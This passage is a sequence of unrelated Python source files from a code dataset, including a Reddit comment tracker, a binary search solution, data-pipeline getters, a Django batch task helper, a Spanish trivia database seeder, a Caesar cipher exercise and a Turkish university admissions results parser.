'[delete]'\r\n return CommentBD(comment.id, root_id, post_id, comment.body, comment.score,\r\n comment.score, int(comment.created_utc), author)\r\n\r\n def save_comment(self, comment: CommentBD):\r\n ans: List[CommentBD] = BD.comment.get(comment.id)\r\n t = int(time())\r\n body = re_q.sub(\"'\", comment.body)\r\n body = re_q2.sub(',', body)\r\n\r\n if ans:\r\n ans_last_body = ans[0].body.split(',,')[-1].split('||')[0]\r\n else:\r\n ans_last_body = ''\r\n\r\n if not ans:\r\n body = f'{body}||{t}'\r\n score = f'{comment.score}={t}'\r\n BD.comment.put(comment.id, comment.root_id, comment.post_id, body,\r\n comment.score, score, comment.time, comment.author)\r\n\r\n elif ans_last_body != body:\r\n body = f'{ans[0].body},,{body}||{t}'\r\n score = f'{ans[0].score},{comment.score}={t}'\r\n BD.comment.up(comment.id, body=body, score=score, score_now=comment.score)\r\n\r\n else:\r\n score = f'{ans[0].score},{comment.score}={t}'\r\n BD.comment.up(comment.id, score=score, score_now=comment.score)\r\n\r\n def is_post_ok(self, post: PostBD):\r\n now_time = int(time())\r\n\r\n last_t = int(now_time - post.time_pars)\r\n t = int(now_time - post.time_post)\r\n\r\n for p, p_itr in self.parser:\r\n if p < t:\r\n if last_t > p_itr:\r\n post.up(time_pars=now_time)\r\n return True\r\n else:\r\n return False\r\n\r\n return False\r\n\r\n async def get_new_comments(self):\r\n ans: List[PostBD] = 
BD.post.get_all()\r\n count = 1\r\n for i, post in enumerate(ans):\r\n\r\n if not self.is_post_ok(post):\r\n continue\r\n\r\n await self.get_comments(post.id)\r\n await sleep(0.1)\r\n\r\n print('get comment post', post.id, count, i, '/', len(ans))\r\n\r\n count += 1\r\n\r\n print('end', count - 1, len(ans))\r\n\r\n async def main(self):\r\n while True:\r\n await self.get_new_comments()\r\n await sleep(60*6)\r\n\r\n\r\nasync def on_start(_):\r\n stat = RedditStat(config.sub)\r\n stat.auth(config.client_id, config.client_secret)\r\n\r\n loop.add(stat.get_new_posts()).add(stat.main()).start()\r\n\r\n\r\nif __name__ == '__main__':\r\n Server().add(on_start).run()\r\n","repo_name":"vurdolag/reddit_statistic","sub_path":"RedditStat.py","file_name":"RedditStat.py","file_ext":"py","file_size_in_byte":5501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"13761668393","text":"#question: https://leetcode.com/problems/binary-search\n#approach: binary search, using my personal preferred template - https://algs4.cs.princeton.edu/11model/BinarySearch.java.html\n\nclass Solution:\n def search(self, nums: List[int], target: int) -> int:\n lo = 0\n hi = len(nums) - 1\n \n while (lo <= hi):\n mid = lo + int((hi - lo)/2)\n if nums[mid] < target:\n lo = mid+1\n elif nums[mid] > target:\n hi = mid-1\n else:\n return mid\n \n return -1\n ","repo_name":"SUKESH127/bitsherpa","sub_path":"[7] Binary Search Leetcode Solutions /binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"30044068856","text":"# *************************************************************************\n# *********************** GETTER METHODS **********************************\n# *************************************************************************\nimport os\nimport pandas as pd\n\n\ndef get_studies():\n studies = ['AG', 'CVDF', 'GLS', 'GEVERSC', 'GEVERSM', 'HMP', 'MUC',\n 'PRJNA418765', 'PRJNA436359', 'QIITA10184', 'QIITA10342', 'QIITA10567',\n 'QIITA1448', 'QIITA2202', 'QIITA550']\n\n return studies\n\n\ndef get_metadata_label():\n '''\n Method to get metadata labels and the response label from data set\n '''\n metadata = ['col_site', 'diagnosis', 'sample_title', 'stool_biopsy', 'studyID', 'uc_cd']\n label = 'diagnosis'\n return metadata, label\n\n\ndef get_studies_by_label():\n dict_studies = {'zero': ['QIITA10567', 'QIITA10184', 'QIITA2202', 'QIITA550', 'QIITA850',\n 'QIITA10342', 'QIITA1448', 'AG', 'CVDF'],\n 'both': ['GEVERSM', 'MUC', 'GLS', 'HMP', 'GEVERSC'],\n 'one': ['PRJNA418765', 'HSCT', 'PRJNA436359', 'Sprockett']}\n\n return dict_studies\n\n\ndef get_component(exp_name, component):\n '''\n exp_name: experiment name, ex: PFAM-LAS-BRM-RF\n components: 'data', 'norm', 'batch', 'model'\n '''\n mapping = {'data': 0,\n 'norm': 1,\n 'batch': 2,\n 'model': 3,\n 'norm2': 4}\n\n exp_split = exp_name.split('-')\n return exp_split[mapping[component]]\n\n\ndef get_pwd(level=0):\n '''\n Method that return a UNIX style string of current\n directory if level = 0. 
Setting level to -1 and\n below goes down by that many levels.\n '''\n sysname = os.name\n work_dir = os.getcwd()\n if sysname == 'nt': # if a windows system\n w = work_dir.split('\\\\')\n if level < 0:\n work_dir = '/'.join(w[:level]) # ~/pipeline_v2\n else:\n work_dir = '/'.join(w)\n else:\n w = work_dir.split('/')\n if level < 0:\n work_dir = '/'.join(w[:level]) # ~/pipeline_v2\n else:\n work_dir = '/'.join(w)\n\n return work_dir\n\n\ndef save_preprocessed_df(df, exp_name, study=None, full=False):\n if full:\n file = '{}-{}-{}-full'.format(get_component(exp_name, component='data'),\n get_component(exp_name, component='norm'),\n get_component(exp_name, component='batch'))\n else:\n file = '{}-{}-{}'.format(get_component(exp_name, component='data'),\n get_component(exp_name, component='norm'),\n get_component(exp_name, component='batch'))\n if study is not None:\n file = '{}-{}'.format(file, study.upper())\n\n path = get_pwd() + '/datasets/batch_reduced'\n if not os.path.isdir(path):\n os.makedirs(path)\n\n df.to_pickle('{}/{}.pkl'.format(path, file))\n\n\ndef get_preprocessed_df(exp_name, study=None, full=False):\n if full:\n file = '{}-{}-{}-full'.format(get_component(exp_name, component='data'),\n get_component(exp_name, component='norm'),\n get_component(exp_name, component='batch'))\n else:\n file = '{}-{}-{}'.format(get_component(exp_name, component='data'),\n get_component(exp_name, component='norm'),\n get_component(exp_name, component='batch'))\n\n if study is not None:\n file = '{}-{}'.format(file, study.upper())\n\n path = get_pwd() + '/datasets/batch_reduced'\n if not os.path.isdir(path):\n os.makedirs(path)\n\n df = pd.read_pickle('{}/{}.pkl'.format(path, file))\n return df\n\n\ndef get_ensemble_names():\n ens_names = ['E_RF_MLP_LR', 'E_RF_MLP_SVC', 'E_RF_SVC_LR', 'E_RF_SVC_SVC', \n 'E_RF_KNN_LR', 'E_RF_KNN_SVC', 'E_MLP_SVC_LR', 'E_MLP_SVC_SVC', \n 'E_MLP_KNN_LR', 'E_MLP_KNN_SVC', 'E_SVC_KNN_LR', 'E_SVC_KNN_SVC',\n 'E_RF_MLP_SVC_LR', 'E_RF_MLP_SVC_SVC', 'E_RF_MLP_KNN_LR', 'E_RF_MLP_KNN_SVC', \n 'E_RF_SVC_KNN_LR', 'E_RF_SVC_KNN_SVC', 'E_MLP_SVC_KNN_LR', 'E_MLP_SVC_KNN_SVC']\n return ens_names\n","repo_name":"phylatechnologies/ibd_classification_benchmark","sub_path":"metadata/getters.py","file_name":"getters.py","file_ext":"py","file_size_in_byte":4249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"3340153724","text":"import logging\nimport random\n\nfrom datetime import timedelta\nfrom django.utils import timezone\nfrom .createProductDetail import create_product_detail\n\n\ndef create_batch_product_details_task(product_class,\n column_name,\n view_json,\n serializer_json,\n task_name, batch_size=10,\n min_time_delay=1, max_time_delay=5):\n product_id_list = list(set(list(product_class.objects.values_list(column_name, flat=True))))\n batchEnd = 0\n total_product_count = len(product_id_list)\n max_iteration_count = (total_product_count // batch_size) + 1\n print(\"Total product count:\", total_product_count)\n print(\"Max iteration count: \", max_iteration_count)\n iteration = 0\n while iteration < max_iteration_count:\n batchStart = batchEnd\n batchEnd = batchStart + batch_size\n iteration += 1\n\n if batchStart > total_product_count-1:\n break\n\n time_delay_in_seconds = random.randint(min_time_delay, max_time_delay)\n next_run = timezone.now() + timedelta(seconds=time_delay_in_seconds)\n\n try:\n print('Iteration count {iteration} Creating product details for batch start:{batchStart}-end:{batchEnd}'\n 
.format(iteration=iteration, batchStart=batchStart, batchEnd=batchEnd))\n\n create_product_detail(product_id_list[batchStart:batchEnd],\n view_json=view_json,\n serializer_json=serializer_json,\n schedule=time_delay_in_seconds,\n verbose_name=task_name + \"-\" + \"batch start-\" +\n str(batchStart) + \"-\" + \"batch end-\" +\n str(batchEnd) + str(next_run))\n except Exception as e:\n print(\"Error in batch product details task creation.\", e)\n\n\n","repo_name":"mesarikaya/Product-Scraper-Microservice","sub_path":"products/views/helpers/createBatchProductDetailsTask.py","file_name":"createBatchProductDetailsTask.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"72601239324","text":"import string \r\ndict1 = {}\r\ndict2 = {}\r\n\r\ndef assign():\r\n str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\r\n cnt = 0\r\n for i in str:\r\n dict1[cnt] = i\r\n dict2[i] = cnt\r\n cnt = cnt+1\r\n\r\ndef encrypt(shift):\r\n file1 = open('input.txt', 'r') \r\n file2 = open('encrypted.txt', 'w') \r\n while 1:\r\n i = file1.read(1) \r\n if not i:\r\n break\r\n if (i.isalpha() == False):\r\n file2.write(i)\r\n else:\r\n a = i.upper()\r\n b = dict2[a]\r\n b = (b+shift)%26\r\n #print('b = ', b)\r\n c = dict1[b]\r\n file2.write(c)\r\n file2.close()\r\n print('encrypted text is')\r\n file2 = open('encrypted.txt', 'r')\r\n print(file2.read())\r\n file2.close()\r\n\r\ndef decrypt(shift): \r\n file2 = open('encrypted.txt', 'r')\r\n file3 = open('decrypted.txt', 'w') \r\n while 1:\r\n i = file2.read(1)\r\n if not i:\r\n break\r\n if (i.isalpha() == False):\r\n file3.write(i)\r\n else:\r\n a = i.upper()\r\n b = dict2[a]\r\n b = (b-shift)%26\r\n #print('b = ', b)\r\n c = dict1[b]\r\n file3.write(c)\r\n print('decrypted text is')\r\n file3 = open('decrypted.txt', 'r')\r\n print(file3.read())\r\n file3.close()\r\n\r\n\r\n\r\nassign()\r\n\r\n","repo_name":"devayani-kv/ciphers","sub_path":"functions_caesar.py","file_name":"functions_caesar.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"30743824057","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom app import db\nfrom app.models import Categoria, Pregunta, Respuesta\n\ndb.drop_all()\ndb.create_all()\n\n#categorias\nc_historia = Categoria(nombre=\"Historia\")\nc_geogra = Categoria(nombre=\"Geografía\")\nc_deporte = Categoria(nombre=\"Deportes\")\nc_arte = Categoria(nombre=\"Arte\")\n\n#preguntas categoria historia --------------------------------------------------\np_descAmerica = Pregunta(texto=\"¿En que año se descubrio américa?\", categoria=c_historia)\np_orientales = Pregunta(texto=\"¿Cuantos eran los 33 orientales?\", categoria=c_historia)\np_napoleon = Pregunta(texto=\"¿Donde nació Napoleon?\", categoria=c_historia)\n\n#respuestas categoria historia\nr_descAmerica1 = Respuesta(texto=\"1492\", es_correcta=\"True\", pregunta=p_descAmerica)\nr_descAmerica2 = Respuesta(texto=\"1515\", es_correcta=\"False\", pregunta=p_descAmerica)\nr_descAmerica3 = Respuesta(texto=\"1980\", es_correcta=\"False\", pregunta=p_descAmerica)\n\nr_orientales1 = Respuesta(texto=\"33\", es_correcta=\"False\", pregunta=p_orientales)\nr_orientales2 = Respuesta(texto=\"menos de 33\", es_correcta=\"False\", pregunta=p_orientales)\nr_orientales3 = Respuesta(texto=\"mas de 33\", es_correcta=\"True\", pregunta=p_orientales)\n\nr_napoleon1 = Respuesta(texto=\"Inglaterra\", es_correcta=\"False\", 
pregunta=p_napoleon)\nr_napoleon2 = Respuesta(texto=\"Francia\", es_correcta=\"True\", pregunta=p_napoleon)\nr_napoleon3 = Respuesta(texto=\"España\", es_correcta=\"False\", pregunta=p_napoleon)\n\n\n#preguntas categoria geografia --------------------------------------------------\np_amazonas = Pregunta(texto=\"¿En que continente esta el Amazonas?\", categoria=c_geogra)\np_montania = Pregunta(texto=\"¿Cual es la montaña mas alta del mundo?\", categoria=c_geogra)\np_pais = Pregunta(texto=\"¿Que país es el 2do mas grande del mundo en términos de población?\", categoria=c_geogra)\n\n#respuestas categoria geografia\nr_amazonas1 = Respuesta(texto=\"Europa\", es_correcta=\"False\", pregunta=p_amazonas)\nr_amazonas2 = Respuesta(texto=\"Africa\", es_correcta=\"False\", pregunta=p_amazonas)\nr_amazonas3 = Respuesta(texto=\"América\", es_correcta=\"True\", pregunta=p_amazonas)\n\nr_montania1 = Respuesta(texto=\"Cerro chato\", es_correcta=\"False\", pregunta=p_montania)\nr_montania2 = Respuesta(texto=\"El everest\", es_correcta=\"True\", pregunta=p_montania)\nr_montania3 = Respuesta(texto=\"El Aconcagua\", es_correcta=\"False\", pregunta=p_montania)\n\nr_pais1 = Respuesta(texto=\"India\", es_correcta=\"True\", pregunta=p_pais)\nr_pais2 = Respuesta(texto=\"China\", es_correcta=\"False\", pregunta=p_pais)\nr_pais3 = Respuesta(texto=\"Rusia\", es_correcta=\"False\", pregunta=p_pais)\n\n\n#preguntas categoria deporte --------------------------------------------------\np_uyCampeon = Pregunta(texto=\"¿Uruguay va a salir campeon de América?\", categoria=c_deporte)\np_tyson = Pregunta(texto=\"¿Tyson sigue boxeando?\", categoria=c_deporte)\np_copas = Pregunta(texto=\"¿Cuantas copas americas tiene uruguay?\", categoria=c_deporte)\n\n#respuestas categoria deporte\nr_uyCampeon1 = Respuesta(texto=\"Quizas\", es_correcta=\"True\", pregunta=p_uyCampeon)\nr_uyCampeon2 = Respuesta(texto=\"No\", es_correcta=\"False\", pregunta=p_uyCampeon)\nr_uyCampeon3 = Respuesta(texto=\"Si\", es_correcta=\"False\", pregunta=p_uyCampeon)\n\nr_tyson1 = Respuesta(texto=\"No, solo muerde\", es_correcta=\"False\", pregunta=p_tyson)\nr_tyson2 = Respuesta(texto=\"Obviamente\", es_correcta=\"False\", pregunta=p_tyson)\nr_tyson3 = Respuesta(texto=\"Ahora solo actua\", es_correcta=\"True\", pregunta=p_tyson)\n\nr_copas1 = Respuesta(texto=\"14\", es_correcta=\"False\", pregunta=p_copas)\nr_copas2 = Respuesta(texto=\"15\", es_correcta=\"True\", pregunta=p_copas)\nr_copas3 = Respuesta(texto=\"16\", es_correcta=\"False\", pregunta=p_copas)\n\n\n#preguntas categoria arte --------------------------------------------------\np_picasso = Pregunta(texto=\"¿Picasso es el padre del cubismo?\", categoria=c_arte)\np_sixtina = Pregunta(texto=\"¿Quien pintó la capilla sixtina?\", categoria=c_arte)\np_coliseo = Pregunta(texto=\"¿Que estilo tienen las columnas inferiores del Coliseo?\", categoria=c_arte)\n\n#respuestas categoria arte\nr_picasso1 = Respuesta(texto=\"No se\", es_correcta=\"False\", pregunta=p_picasso)\nr_picasso2 = Respuesta(texto=\"No\", es_correcta=\"False\", pregunta=p_picasso)\nr_picasso3 = Respuesta(texto=\"Si\", es_correcta=\"True\", pregunta=p_picasso)\n\nr_sixtina1 = Respuesta(texto=\"Rafael\", es_correcta=\"False\", pregunta=p_sixtina)\nr_sixtina2 = Respuesta(texto=\"Donatello\", es_correcta=\"False\", pregunta=p_sixtina)\nr_sixtina3 = Respuesta(texto=\"Miguel Angel\", es_correcta=\"True\", pregunta=p_sixtina)\n\nr_coliseo1 = Respuesta(texto=\"Dorico\", es_correcta=\"True\", pregunta=p_coliseo)\nr_coliseo2 = Respuesta(texto=\"Jonico\", 
es_correcta=\"False\", pregunta=p_coliseo)\nr_coliseo3 = Respuesta(texto=\"Corintio\", es_correcta=\"False\", pregunta=p_coliseo)\n\n\n# agregamos todo a la sesión y luego commmiteamos\n#categorias\ndb.session.add(c_historia)\ndb.session.add(c_geogra)\ndb.session.add(c_deporte)\ndb.session.add(c_arte)\n\n#preguntas categoria historia --------------------------------------------------\ndb.session.add(p_descAmerica)\ndb.session.add(p_orientales)\ndb.session.add(p_napoleon)\n\n#respuestas categoria historia\ndb.session.add(r_descAmerica1)\ndb.session.add(r_orientales1)\ndb.session.add(r_napoleon1)\n\ndb.session.add(r_descAmerica2)\ndb.session.add(r_orientales2)\ndb.session.add(r_napoleon2)\n\ndb.session.add(r_descAmerica3)\ndb.session.add(r_orientales3)\ndb.session.add(r_napoleon3)\n\n#preguntas categoria geografia --------------------------------------------------\ndb.session.add(p_amazonas)\ndb.session.add(p_montania)\ndb.session.add(p_pais)\n\n#respuestas categoria geografia\ndb.session.add(r_amazonas1)\ndb.session.add(r_montania1)\ndb.session.add(r_pais1)\n\ndb.session.add(r_amazonas2)\ndb.session.add(r_montania2)\ndb.session.add(r_pais2)\n\ndb.session.add(r_amazonas3)\ndb.session.add(r_montania3)\ndb.session.add(r_pais3)\n\n#preguntas categoria deporte --------------------------------------------------\ndb.session.add(p_uyCampeon)\ndb.session.add(p_tyson)\ndb.session.add(p_copas)\n\n#respuestas categoria deporte\ndb.session.add(r_uyCampeon1)\ndb.session.add(r_tyson1)\ndb.session.add(r_copas1)\n\ndb.session.add(r_uyCampeon2)\ndb.session.add(r_tyson2)\ndb.session.add(r_copas2)\n\ndb.session.add(r_uyCampeon3)\ndb.session.add(r_tyson3)\ndb.session.add(r_copas3)\n\n#preguntas categoria arte --------------------------------------------------\ndb.session.add(p_picasso)\ndb.session.add(p_sixtina)\ndb.session.add(p_coliseo)\n\n#respuestas categoria arte\ndb.session.add(r_picasso1)\ndb.session.add(r_sixtina1)\ndb.session.add(r_coliseo1)\n\ndb.session.add(r_picasso2)\ndb.session.add(r_sixtina2)\ndb.session.add(r_coliseo2)\n\ndb.session.add(r_picasso3)\ndb.session.add(r_sixtina3)\ndb.session.add(r_coliseo3)\n\ndb.session.commit()","repo_name":"defabiouy/trivia_game","sub_path":"populate.py","file_name":"populate.py","file_ext":"py","file_size_in_byte":6737,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"15988364313","text":"# input parsing\ninput_file = 'day18\\input.txt'\nwith open(input_file) as infile:\n cubes = [[int(elem) for elem in line.strip().split(',')] for line in infile]\nprint(cubes)\n\narea_count = 0\nfor cube in cubes:\n cube_up = [cube[0],cube[1],cube[2]+1]\n cube_down = [cube[0],cube[1],cube[2]-1]\n cube_x_right = [cube[0]+1,cube[1],cube[2]]\n cube_x_left = [cube[0]-1,cube[1],cube[2]]\n cube_y_right = [cube[0],cube[1]+1,cube[2]]\n cube_y_left = [cube[0],cube[1]-1,cube[2]]\n adjacent_cubes = [cube_up,cube_down,cube_x_left,cube_x_right,cube_y_left,cube_y_right]\n\n for adj_cube in adjacent_cubes:\n if adj_cube not in cubes:\n area_count += 1\nprint(area_count)","repo_name":"Vallfors99/AdventOfCode-2022","sub_path":"day18/part_1.py","file_name":"part_1.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"32820450196","text":"\n'''\nAuthor: Mustafa Camurli\nData: : 16.08.2016 (Tuesday)\nE-mail: mustafa.camurli@gmail.com\n'''\n\nimport re\nimport sys\nimport string\n\nPROGRAM_NAME_STRING = \"Bilgisayar 
Mühendisliği\"\n\nPROGRAM_LANG_ENGLISH_STRING = \"(İngilizce)\"\nPROGRAM_LANG_GERMAN_STRING = \"(Almanca)\"\n\nPROGRAM_EVENING_EDU_STRING = \"(İÖ)\"\n\nPROGRAM_SCHOLARSHIP_MARKER_STRING = \"Burslu\"\nPROGRAM_25_PER_SCHOLARSHIP_STRING = \"%25 Burslu\"\nPROGRAM_50_PER_SCHOLARSHIP_STRING = \"%50 Burslu\"\nPROGRAM_75_PER_SCHOLARSHIP_STRING = \"%75 Burslu\"\nPROGRAM_NO_SCHOLARSHIP_STRING = \"Ücretli\"\nPROGRAM_FULL_SCHOLARSHIP_STRING = \"Tam Burslu\"\n\nPROGRAM_TECH_HIGH_SCHOOL_PRIV = \"(M.T.O.K.)\"\n\nPROGRAM_FIELD_MARKER_STRING = \"MF-4\"\n\nPROGRAM_SCORE_NONE_STRING = \"---\"\n\nclass Language(enumerate):\n TURKISH = 1\n ENGLISH = 2\n GERMAN = 3\n\nclass MalformedUniversityStringException(Exception):\n def __init__(self, str):\n Exception.__init__(self, \"MalformedUniversityStringException\")\n self.str = str\n\nclass MalformedFacultyStringException(Exception):\n def __init__(self, str):\n Exception.__init__(self, \"MalformedFacultyStringException\")\n self.str = str\n\nclass MalformedProgramStateStringException(Exception):\n def __init__(self, str):\n Exception.__init__(self, \"MalformedProgramStateStringException\")\n self.str = str\n\nclass Program:\n __name = None\n __language = None\n __scholarship = None\n __is_evening_edu = None\n __is_tech_high_school_priv = None\n __student_quota = None\n __num_of_student_got_in = None\n __score_lower_bound = None\n __score_upper_bound = None\n\n def __get_program_lang_from_string(self, program_str):\n if ( -1 != program_str.find(PROGRAM_LANG_ENGLISH_STRING) ):\n return (Language.ENGLISH)\n elif ( -1 != program_str.find(PROGRAM_LANG_GERMAN_STRING) ):\n return (Language.GERMAN)\n else:\n return (Language.TURKISH)\n\n def __get_program_is_evening_edu_state_from_string(self, program_str):\n if ( -1 != program_str.find(PROGRAM_EVENING_EDU_STRING) ):\n return (True)\n return (False)\n\n def __get_program_is_tech_high_school_priv_state_from_string(self, program_str):\n if ( -1 != program_str.find(PROGRAM_TECH_HIGH_SCHOOL_PRIV) ):\n return (True)\n return (False)\n\n def __get_program_scholarship_status_from_string(self, program_str):\n if ( -1 != program_str.find(PROGRAM_NO_SCHOLARSHIP_STRING) ):\n return (0)\n elif ( -1 != program_str.find(PROGRAM_SCHOLARSHIP_MARKER_STRING) ):\n if ( -1 != program_str.find(PROGRAM_FULL_SCHOLARSHIP_STRING) ):\n return (100)\n elif ( -1 != program_str.find(PROGRAM_25_PER_SCHOLARSHIP_STRING) ):\n return (25)\n elif ( -1 != program_str.find(PROGRAM_50_PER_SCHOLARSHIP_STRING) ):\n return (50)\n elif ( -1 != program_str.find(PROGRAM_75_PER_SCHOLARSHIP_STRING) ):\n return (75)\n else:\n return (-2) # indicates error\n else:\n return (-1) # indicates state university\n\n def __get_program_student_and_score_attributes(self, program_str):\n field_marker_idx = program_str.find(PROGRAM_FIELD_MARKER_STRING)\n if ( -1 == field_marker_idx ):\n raise MalformedProgramStateStringException(program_str)\n stats = (program_str[field_marker_idx + len(PROGRAM_FIELD_MARKER_STRING):]).split(\" \")\n while '' in stats:\n stats.remove('')\n for i in range(len(stats)):\n stats[i] = stats[i].strip(\"\\n\")\n if ( len(stats) != 4 ):\n raise MalformedProgramStateStringException(program_str)\n for i in range(len(stats)):\n stats[i] = stats[i].replace(\",\", \".\")\n if ( (stats[2] == PROGRAM_SCORE_NONE_STRING) and (stats[3] == PROGRAM_SCORE_NONE_STRING) ):\n return [int(stats[0]), int(stats[1]), float(0), float(0)]\n return [int(stats[0]), int(stats[1]), float(stats[2]), float(stats[3])]\n\n def __init__(self, program_str):\n self.__name = 
PROGRAM_NAME_STRING\n self.__scholarship = -1\n self.__is_evening_edu = False\n self.__language = Language.TURKISH\n self.__is_tech_high_school_priv = False\n self.__student_quota = 0\n self.__num_of_student_got_in = 0\n self.__score_lower_bound = 0\n self.__score_upper_bound = 0\n\n self.__language = self.__get_program_lang_from_string(program_str)\n self.__is_evening_edu = self.__get_program_is_evening_edu_state_from_string(program_str)\n self.__is_tech_high_school_priv = self.__get_program_is_tech_high_school_priv_state_from_string(program_str)\n self.__scholarship = self.__get_program_scholarship_status_from_string(program_str)\n student_and_score_attr = self.__get_program_student_and_score_attributes(program_str)\n self.__student_quota = student_and_score_attr[0]\n self.__num_of_student_got_in = student_and_score_attr[1]\n self.__score_lower_bound = student_and_score_attr[2]\n self.__score_upper_bound = student_and_score_attr[3]\n\n def get_program_lower_bound_score(self):\n return (self.__score_lower_bound)\n\n def get_program_upper_bound_score(self):\n return (self.__score_upper_bound)\n\n def get_program_name(self):\n return (self.__name)\n\n def get_program_scholarship(self):\n return (self.__scholarship)\n\n def get_program_is_private(self):\n if ( -1 == self.__scholarship ):\n return (False)\n return (True)\n\n def get_program_is_evening_edu(self):\n return (self.__is_evening_edu)\n\n def get_program_language(self):\n return (self.__language)\n\n def get_program_is_tech_high_school_priv(self):\n return (self.__is_tech_high_school_priv)\n\n def get_program_student_quota(self):\n return (self.__student_quota)\n\n def get_program_num_of_student_got_in(self):\n return (self.__num_of_student_got_in)\n\nclass Faculty:\n __name = None\n __programs = None\n\n def __init__(self, faculty_str):\n self.check_faculty_str_fmr(faculty_str)\n\n self.__name = \"\"\n self.__programs = []\n\n splitted_faculty_str = faculty_str.split('/', 1)\n self.__name = splitted_faculty_str[0]\n self.add_program(faculty_str)\n\n def check_name(self, faculty_str):\n self.check_faculty_str_fmr(faculty_str)\n splitted_faculty_str = faculty_str.split('/', 1)\n if ( splitted_faculty_str[0] == self.__name ):\n return (True)\n return (False)\n\n def add_program(self, faculty_str):\n self.check_faculty_str_fmr(faculty_str)\n splitted_faculty_str = faculty_str.split('/', 1)\n self.__programs.append(Program(splitted_faculty_str[1]))\n\n def get_faculty_name(self):\n return (self.__name)\n\n def get_num_of_programs(self):\n return (len(self.__programs))\n\n def get_program_by_index(self, index):\n return (self.__programs[index])\n\n def get_program_names_in_faculty(self):\n prog_names = []\n for p in self.__programs:\n prog_names.append(self.__name + \" - \" + p.get_program_name())\n return (prog_names)\n\n def get_program_name_and_lb_score_in_faculty(self):\n prog_name_and_scores = []\n for p in self.__programs:\n prog_name_and_scores.append({'name' : self.__name + \" - \" + p.get_program_name(),\n 'lb_score' : p.get_program_lower_bound_score()})\n return (prog_name_and_scores)\n\n def get_program_name_and_ub_score_in_faculty(self):\n prog_name_and_scores = []\n for p in self.__programs:\n prog_name_and_scores.append({'name' : self.__name + \" - \" + p.get_program_name(),\n 'ub_score' : p.get_program_upper_bound_score()})\n return (prog_name_and_scores)\n\n def check_if_programs_have_scholarship(self):\n for i in range(len(self.__programs)):\n if ( -1 != self.__programs[i].get_program_scholarship() ):\n return (True)\n 
return (False)\n\n @staticmethod\n def check_faculty_str_fmr(faculty_str):\n faculty_str_split = faculty_str.split('/')\n if ( len(faculty_str_split) != 2 ):\n raise MalformedFacultyStringException(faculty_str)\n\nclass Univesity:\n __name = None\n __faculties = None\n\n def __get_faculty_idx_with_name(self, facutly_str):\n for i in range(len(self.__faculties)):\n if ( True == self.__faculties[i].check_name(facutly_str) ):\n return (i)\n return (-1)\n\n def __check_if_faculties_have_program_with_scholarship(self):\n for i in range(len(self.__faculties)):\n if ( True == self.__faculties[i].check_if_programs_have_scholarship() ):\n return (True)\n return (False)\n\n def __init__(self, uni_str):\n self.check_uni_str_fmt(uni_str)\n\n self.__name = \"\"\n self.__faculties = []\n\n splitted_uni_str = uni_str.split('/', 1)\n self.__name = splitted_uni_str[0]\n self.add_program(uni_str)\n\n def add_program(self, uni_str):\n self.check_uni_str_fmt(uni_str)\n splitted_uni_str = uni_str.split('/', 1)\n faculty_idx = self.__get_faculty_idx_with_name(splitted_uni_str[1])\n if ( -1 == faculty_idx ):\n self.__faculties.append(Faculty(splitted_uni_str[1]))\n else:\n self.__faculties[faculty_idx].add_program(splitted_uni_str[1])\n\n def get_university_name(self):\n return (self.__name)\n\n def get_num_of_faculties(self):\n return (len(self.__faculties))\n\n def get_faculty_by_index(self, index):\n return (self.__faculties[index])\n\n def get_program_names_in_university(self):\n prog_names = []\n for f in self.__faculties:\n faculty_prog_names = f.get_program_names_in_faculty()\n for faculty_prog_name in faculty_prog_names:\n prog_names.append(self.__name + \" - \" + faculty_prog_name)\n return (prog_names)\n\n def get_program_name_and_lb_scores_in_university(self):\n prog_name_and_scores = []\n for f in self.__faculties:\n faculty_prog_name_and_scores = f.get_program_name_and_lb_score_in_faculty()\n for faculty_prog_scores in faculty_prog_name_and_scores:\n prog_name_and_scores.append({'name' : self.__name + \" - \" + faculty_prog_scores['name'],\n 'lb_score' : faculty_prog_scores['lb_score']})\n return (prog_name_and_scores)\n\n def get_program_name_and_ub_scores_in_university(self):\n prog_name_and_scores = []\n for f in self.__faculties:\n faculty_prog_name_and_scores = f.get_program_name_and_ub_score_in_faculty()\n for faculty_prog_scores in faculty_prog_name_and_scores:\n prog_name_and_scores.append({'name' : self.__name + \" - \" + faculty_prog_scores['name'],\n 'ub_score' : faculty_prog_scores['ub_score']})\n return (prog_name_and_scores)\n\n @staticmethod\n def check_uni_str_fmt(uni_str):\n uni_str_split = uni_str.split('/')\n if ( len(uni_str_split) != 3 ):\n raise MalformedUniversityStringException(uni_str)\n\n @staticmethod\n def get_university_idx_from_uni_list(uni_list, uni_str):\n Univesity.check_uni_str_fmt(uni_str)\n splitted_uni_str = uni_str.split('/', 1)\n for i in range(len(uni_list)):\n if ( splitted_uni_str[0] == uni_list[i].get_university_name() ):\n return (i)\n return (-1)\n\nif __name__ == \"__main__\":\n university_list = []\n fd = open(\"cse_results.txt\", encoding = \"utf8\");\n while True:\n try:\n line = fd.readline()\n if ( \"\" == line ):\n break\n line.rstrip('\\n').rstrip('\\r')\n if ( \"\\n\" != line ):\n uni_idx = Univesity.get_university_idx_from_uni_list(university_list, line)\n if ( -1 == uni_idx ):\n university_list.append(Univesity(line))\n else:\n university_list[uni_idx].add_program(line)\n\n except MalformedUniversityStringException as e:\n print (e.str)\n 
